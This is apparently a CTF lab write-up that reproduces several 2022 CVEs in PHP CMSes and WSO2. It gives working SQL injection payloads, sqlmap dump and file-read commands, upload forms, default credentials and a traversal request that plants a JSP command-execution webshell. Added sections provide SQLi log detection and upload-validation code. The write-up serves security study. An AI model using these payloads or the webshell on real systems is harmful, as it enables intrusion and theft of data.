## CVE-2022-32991
Grab the source here and audit it.
Searching by the CVE number turns up the name of the source package.
![image-20230115222340861](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230115222340861.png)
![image-20230115222353905](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230115222353905.png)
![image-20230115222410584](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230115222410584.png)
```
<@urlencode>-60377db362694'<@/urlencode>
```
![image-20230115213445009](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230115213445009.png)
![image-20230115212910747](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230115212910747.png)
![image-20230115213546242](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230115213546242.png)
```sql
60377db362694' order by 5 --
60377db362694' order by 6 --
```
![image-20230115213635326](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230115213635326.png)
```sql
60377db362694' union select 1,2,3,4,5 --
```
![image-20230115213704382](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230115213704382.png)
```sql
60377db362694' union select 1,2,(select group_concat(schema_name) from information_schema.schemata),4,5 --
```
![image-20230115214928863](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230115214928863.png)
```sql
60377db362694' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='flag'),4,5 --
```
![image-20230115215425931](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230115215425931.png)
```sql
60377db362694' union select 1,2,(select flag from ctf.flag),4,5 --
```
![image-20230115215421361](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230115215421361.png)
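The probing sequence above (count columns with `order by`, then `union select`, then pull `information_schema`) leaves a very recognisable trail in web server access logs. The following is an added detection example, not code from the original writeup: it parses Common Log Format lines, URL-decodes the query string (the payload above was sent through a `<@urlencode>` tag, so the raw log holds `%27` and `+`), flags each step of the technique, and groups hits per client. The log lines and the `/search.php` endpoint are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed Apache/nginx-style access-log lines (not from the original post).
# The query strings mirror the probing sequence above (ORDER BY column
# counting, then UNION SELECT, then information_schema enumeration),
# URL-encoded the way a browser or intercepting proxy would send them.
# The endpoint name /search.php is an assumption.
SAMPLE_LOG = """\
10.0.0.5 - - [15/Jan/2023:21:34:45 +0800] "GET /search.php?id=60377db362694%27+order+by+5+--+ HTTP/1.1" 200 512
10.0.0.5 - - [15/Jan/2023:21:35:01 +0800] "GET /search.php?id=60377db362694%27+order+by+6+--+ HTTP/1.1" 500 231
10.0.0.5 - - [15/Jan/2023:21:37:04 +0800] "GET /search.php?id=60377db362694%27+union+select+1%2C2%2C3%2C4%2C5+--+ HTTP/1.1" 200 640
10.0.0.5 - - [15/Jan/2023:21:49:28 +0800] "GET /search.php?id=60377db362694%27+union+select+1%2C2%2C%28select+group_concat%28schema_name%29+from+information_schema.schemata%29%2C4%2C5+--+ HTTP/1.1" 200 701
10.0.0.9 - - [15/Jan/2023:21:50:00 +0800] "GET /search.php?id=42 HTTP/1.1" 200 512
10.0.0.7 - - [15/Jan/2023:21:51:10 +0800] "GET /post.php?title=order+of+the+phoenix HTTP/1.1" 200 888
"""

# Common Log Format: client, identity, user, [timestamp], "request line", status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each indicator is one step of the technique shown above; matching is done on
# the decoded, lower-cased query so encoding and case tricks do not hide it.
INDICATORS = {
    "order_by": re.compile(r"\border\s+by\s+\d+"),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "information_schema": re.compile(r"\binformation_schema\."),
    "comment_tail": re.compile(r"(?:--|#)\s*$"),
}


def decode_query(target):
    """Return the URL-decoded, whitespace-normalised, lower-cased query string.

    Decoding is repeated (bounded) so a double-encoded payload is also seen in
    clear; a literal '+' that survives the first pass is treated as a space,
    which is acceptable for detection but not for reconstructing exact input.
    """
    query = target.partition("?")[2]
    for _ in range(3):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    return re.sub(r"\s+", " ", query).strip().lower()


def classify(query):
    """Names of the indicators present in an already-decoded query string."""
    return [name for name, rx in INDICATORS.items() if rx.search(query)]


def scan(log_text):
    """Parse each log line and keep those whose query carries any indicator."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip rather than crash the scan
        query = decode_query(m["target"])
        hits = classify(query)
        if hits:
            findings.append({
                "ip": m["ip"],
                "status": int(m["status"]),
                "query": query,
                "indicators": hits,
            })
    return findings


def probing_sources(findings, threshold=3):
    """Clients with at least `threshold` flagged requests: a single hit may be a
    false positive, a run of them is the column-counting/union sequence."""
    counts = Counter(f["ip"] for f in findings)
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for f in found:
        print(f["ip"], f["status"], f["indicators"], f["query"])
    print("probing sources:", probing_sources(found))
```

The `500` on the `order by 6` line is itself a useful signal: the column count was overshot and the query errored, which is exactly what the second screenshot above shows from the attacker's side.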
## CVE-2022-30887
![image-20230116162156012](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230116162156012.png)
![image-20230116162235456](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230116162235456.png)
Set it up.
![image-20230116170609300](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230116170609300.png)
Look for the username and password.
![image-20230116170550915](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230116170550915.png)
![image-20230116170626787](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230116170626787.png)
This one is simple too.
![image-20230116170821250](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230116170821250.png)
![image-20230116171831259](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230116171831259.png)
![image-20230116171844754](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230116171844754.png)
![image-20230116171901114](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230116171901114.png)
![image-20230116171912135](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230116171912135.png)
These are all arbitrary file uploads.
![image-20230116171953767](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230116171953767.png)
## CVE-2022-29464
https://github.com/wso2/product-apim/releases/tag/v4.0.0
![image-20230116195501169](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230116195501169.png)
![image-20230116222901140](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230116222901140.png)
```http
POST /fileupload/toolsAny HTTP/2
Host: eci-2zebqk49mtyq78wkry75.cloudeci1.ichunqiu.com:9443
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 882
Content-Type: multipart/form-data; boundary=4ef9f369a86bfaadf5ec3177278d49c0
User-Agent: python-requests/2.22.0

--4ef9f369a86bfaadf5ec3177278d49c0
Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/1.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/1.jsp"

<FORM>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
  String s = null;
  try {
    Process p = Runtime.getRuntime().exec(cmd,null,null);
    BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
    while((s = sI.readLine()) != null) { output += s+"</br>"; }
  } catch(IOException e) { e.printStackTrace(); }
}
%>
<%=output %>
--4ef9f369a86bfaadf5ec3177278d49c0--
```
![image-20230116202847100](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230116202847100.png)
![image-20230116202915376](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230116202915376.png)
![image-20230116202951988](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230116202951988.png)
## CVE-2022-28525
![image-20230116232055204](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230116232055204.png)
![image-20230116232511034](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230116232511034.png)
![image-20230116235842612](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230116235842612.png)
Looking through these upload handlers, this one allows unauthenticated upload.
![image-20230117002013377](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230117002013377.png)
```html
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>upload</title>
</head>
<body>
  <form action="http://eci-2ze3p3ftillcjaoxi4jq.cloudeci1.ichunqiu.com/admin/admin_includes/admin_edit_user.php" method="post" enctype="multipart/form-data">
    <input type="text" name="updateusersubmit" value="123">
    <input type="text" name="user_image" value="new">
    <input type="file" name="new_image"><br>
    <input type="submit" value="上传">
  </form>
</body>
</html>
```
![image-20230117002101427](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230117002101427.png)
Build the form.
![image-20230117002142479](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230117002142479.png)
Then just visit the file in the corresponding directory.
http://eci-2ze3p3ftillcjaoxi4jq.cloudeci1.ichunqiu.com/admin/images/zf.php
![image-20230117002224703](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230117002224703.png)
## CVE-2022-28512
![image-20230117010049685](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230117010049685.png)
![image-20230117010104490](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230117010104490.png)
When configuring the database settings, a global search for blog_admin_db finds the config.
Fill in the password.
![image-20230117191531945](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230117191531945.png)
![image-20230117184440505](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230117184440505.png)
Obvious SQL injection.
![image-20230117193804393](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230117193804393.png)
```
python .\sqlmap.py --batch -u http://eci-2ze8f6pzti1nb9zy5f57.cloudeci1.ichunqiu.com/single.php?id=5
```
![image-20230117193732861](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230117193732861.png)
```
python .\sqlmap.py --batch -u http://eci-2ze8f6pzti1nb9zy5f57.cloudeci1.ichunqiu.com/single.php?id=5 --dbs
```
![image-20230117193544675](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230117193544675.png)
```
python .\sqlmap.py --batch -u http://eci-2ze8f6pzti1nb9zy5f57.cloudeci1.ichunqiu.com/single.php?id=5 -D ctf --tables
```
![image-20230117193620905](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230117193620905.png)
```
python .\sqlmap.py --batch -u http://eci-2ze8f6pzti1nb9zy5f57.cloudeci1.ichunqiu.com/single.php?id=5 -D ctf -T flag --columns
```
![image-20230117195521827](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230117195521827.png)
```
python .\sqlmap.py --batch -u http://eci-2ze8f6pzti1nb9zy5f57.cloudeci1.ichunqiu.com/single.php?id=5 -D ctf -T flag -C flag --dump
```
![image-20230117195606487](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230117195606487.png)
## CVE-2022-28060
![image-20230118011646639](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118011646639.png)
![image-20230118011658660](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118011658660.png)
![image-20230118011708449](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118011708449.png)
Obvious injection.
![image-20230118191506590](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118191506590.png)
This is also obvious SQL injection, because the correct line should be

```php
$user_name = mysqli_real_escape_string($con, $user_name);
```

whereas here the escaping call is made but its result is never assigned back, so the raw input still reaches the query.
![image-20230118192826387](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118192826387.png)
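The bug above is worth seeing side by side: escaping that is computed and thrown away is identical to no escaping at all. The following is an added example, not code from the original writeup or from the CMS; it uses SQLite in memory with a constructed `users` table, and `escape()` is a stand-in for `mysqli_real_escape_string` (an assumption, since SQLite has no such call). `lookup_broken` reproduces the discarded-result mistake, `lookup_escaped` is the corrected line, and `lookup_param` is the bound-parameter version that needs no quoting logic at all.

```python
import sqlite3


def make_db():
    """In-memory database with a constructed users table (sample data, not from the page)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (user_name TEXT, user_password TEXT, user_role TEXT)")
    con.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "s3cret", "admin"), ("bob", "hunter2", "author")],
    )
    return con


def escape(value):
    """Stand-in for mysqli_real_escape_string (assumption: SQLite has no such
    call): doubles single quotes so the value can be spliced into a quoted literal."""
    return value.replace("'", "''")


def lookup_broken(con, user_name):
    """Mirrors the bug the page points out: the escape function *is* called,
    but its return value is discarded, so the raw input reaches the query."""
    escape(user_name)  # result thrown away, exactly like the vulnerable CMS line
    sql = f"SELECT user_name, user_role FROM users WHERE user_name = '{user_name}'"
    return con.execute(sql).fetchall()


def lookup_escaped(con, user_name):
    """What the corrected line does: assign the escaped value back before use."""
    user_name = escape(user_name)
    sql = f"SELECT user_name, user_role FROM users WHERE user_name = '{user_name}'"
    return con.execute(sql).fetchall()


def lookup_param(con, user_name):
    """Preferred fix: a bound parameter, so no quoting logic is needed at all."""
    return con.execute(
        "SELECT user_name, user_role FROM users WHERE user_name = ?", (user_name,)
    ).fetchall()


def demo():
    """Run the three variants against a tautology and an apostrophe name."""
    con = make_db()
    tautology = "x' OR '1'='1"  # constructed test input, the textbook login bypass
    try:
        lookup_broken(con, "o'brien")  # a legitimate name breaks the concatenated query
        broken_errors_on_apostrophe = False
    except sqlite3.OperationalError:
        broken_errors_on_apostrophe = True
    return {
        "broken_rows": len(lookup_broken(con, tautology)),    # every user comes back
        "escaped_rows": len(lookup_escaped(con, tautology)),  # no such user name
        "param_rows": len(lookup_param(con, tautology)),      # no such user name
        "param_normal": lookup_param(con, "alice"),
        "broken_errors_on_apostrophe": broken_errors_on_apostrophe,
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The apostrophe case is the reason to prefer parameters over escaping even when the escaping is applied correctly: a user named `o'brien` crashes the concatenated query, while the bound parameter simply returns no rows.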
There is another file upload here.
![image-20230118192024783](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118192024783.png)
```html
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>upload</title>
</head>
<body>
  <form action="http://stu/admin/includes/admin_add_post.php" method="post" enctype="multipart/form-data">
    <input type="text" name="create_post" value="123">
    <input type="file" name="post_image"><br>
    <input type="submit" value="上传">
  </form>
</body>
</html>
```
![image-20230118192101130](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118192101130.png)
```
python .\sqlmap.py --batch -r D:\Download\sql.txt --dbs
```
![image-20230118194329594](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118194329594.png)
```
python .\sqlmap.py --batch -r D:\Download\sql.txt -D php_cms --tables
```
![image-20230118195001157](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118195001157.png)
No flag table, so guess that it lives in a file.

```
python .\sqlmap.py --batch -r D:\Download\sql.txt --sql-shell
```

```sql
select load_file('/flag')
```
![image-20230118195726940](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118195726940.png)
## CVE-2022-26201
![image-20230118011658660](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118011658660.png)
![image-20230118011708449](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118011708449.png)
Quite a lot of injection points.
![image-20230118230433411](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118230433411.png)
```
python .\sqlmap.py --batch -r D:\Download\sql.txt --dbs
```
![image-20230118230622204](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118230622204.png)
```
python .\sqlmap.py --batch -r D:\Download\sql.txt --file-read "/flag"
```
![image-20230118230656298](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118230656298.png)
## CVE-2022-26965
![image-20230118200918518](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118200918518.png)
![image-20230118200938557](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118200938557.png)
![image-20230118215007351](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118215007351.png)
An obvious file upload here, followed by extraction of the archive.
Log in as admin.
![image-20230118223006889](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118223006889.png)
Zip up the PHP file.
![image-20230118223057584](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118223057584.png)
http://eci-2zeinn5hdxurnzllfr7s.cloudeci1.ichunqiu.com/data/themes/zf/zf.php

Just visit it.
![image-20230118223129303](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118223129303.png)
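Every upload in this writeup fails in one of a few ways: no authentication on the handler (CVE-2022-28525, CVE-2022-28060), a client-controlled path in the form-field and file name (the `../../` in the CVE-2022-29464 request), no check on what is actually uploaded (CVE-2022-30887), or an archive whose members are written out unchecked (the theme zip in CVE-2022-26965). The following is an added example of the server-side checks that close all of these, not code from the original writeup or from any of the CMSes: `store_upload` gates on a session flag, accepts only a bare name with a single allowed extension, verifies the body against the magic bytes for that type and picks a random storage name; `check_archive_members` vets a zip before extraction so no member escapes the target directory or carries a script extension. The allowlists, the `images/` prefix and the sample archives are constructed for the example.

```python
import io
import posixpath
import secrets
import zipfile

# Constructed allowlist: extension -> magic bytes the body must start with.
IMAGE_TYPES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}
# Constructed allowlist for members of a theme archive (no server-side scripts).
THEME_TYPES = {".css", ".js", ".png", ".jpg", ".gif", ".svg"}


class UploadRejected(ValueError):
    """Raised for any upload the server should refuse."""


def check_name(name, allowed=IMAGE_TYPES):
    """Accept only a bare file name with a single allowed extension.

    Rejects separators and traversal (the WSO2 request above put '../' in the
    form-field name and file name), NUL bytes and double extensions.
    Returns the normalised extension.
    """
    if not name or "\x00" in name:
        raise UploadRejected("empty name or NUL byte")
    if name in (".", "..") or "\\" in name or name != posixpath.basename(name):
        raise UploadRejected(f"path components not allowed: {name!r}")
    stem, ext = posixpath.splitext(name)
    ext = ext.lower()
    if ext not in allowed or posixpath.splitext(stem)[1]:
        raise UploadRejected(f"extension not allowed: {name!r}")
    return ext


def store_upload(session_is_admin, filename, content):
    """Gate the upload on authentication (the unauthenticated handlers above
    skipped this), check name and content, and pick a random server-side name
    so the client never chooses where the file lands.  Returns the relative path."""
    if not session_is_admin:
        raise UploadRejected("authentication required")
    ext = check_name(filename)
    if not content.startswith(IMAGE_TYPES[ext]):
        raise UploadRejected("content does not match declared type")
    return posixpath.join("images", secrets.token_hex(16) + ext)


def check_archive_members(zip_bytes, allowed=THEME_TYPES):
    """Vet a theme archive before extraction (the zip route above): every
    member must stay inside the extraction directory and carry an allowed
    extension.  Returns the normalised member paths that may be extracted."""
    vetted = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            if not name or "\x00" in name or "\\" in name or name.startswith("/"):
                raise UploadRejected(f"bad member path: {name!r}")
            normalized = posixpath.normpath(name)
            if normalized == ".." or normalized.startswith("../"):
                raise UploadRejected(f"traversal in member: {name!r}")
            if info.is_dir():
                continue
            if posixpath.splitext(normalized)[1].lower() not in allowed:
                raise UploadRejected(f"member type not allowed: {name!r}")
            vetted.append(normalized)
    return vetted


def build_zip(entries):
    """Constructed in-memory archive from (name, bytes) pairs, for testing."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries:
            zf.writestr(name, data)
    return buf.getvalue()


def rejects(fn, *args):
    """True when fn(*args) raises UploadRejected."""
    try:
        fn(*args)
    except UploadRejected:
        return True
    return False
```

The archive check deliberately rejects the whole upload on the first bad member rather than skipping it: a theme that carries a `.php` file or a `../` entry was not produced by a legitimate theme packager, and partially extracting it only hides the evidence.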
## CVE-2022-25578
![image-20230119170149088](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230119170149088.png)
![image-20230119170254538](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230119170254538.png)
Default credentials: admin / tao.
![image-20230119170414046](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230119170414046.png)
![image-20230119170548516](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230119170548516.png)
![image-20230119170616878](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230119170616878.png)
## CVE-2022-25488
![image-20230119171427141](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230119171427141.png)
![image-20230124185510868](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230124185510868.png)
![image-20230119173719305](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230119173719305.png)
Obvious SQL injection.

```
python .\sqlmap.py --batch -u http://eci-2ze34jnwwd2dzf7jz8el.cloudeci1.ichunqiu.com/admin/ajax/avatar.php?id=1 --dbs
```
![image-20230119174011347](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230119174011347.png)
```
python .\sqlmap.py --batch -u http://eci-2ze34jnwwd2dzf7jz8el.cloudeci1.ichunqiu.com/admin/ajax/avatar.php?id=1 --sql-shell
```

```sql
select load_file('/flag')
```
![image-20230119174027218](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230119174027218.png)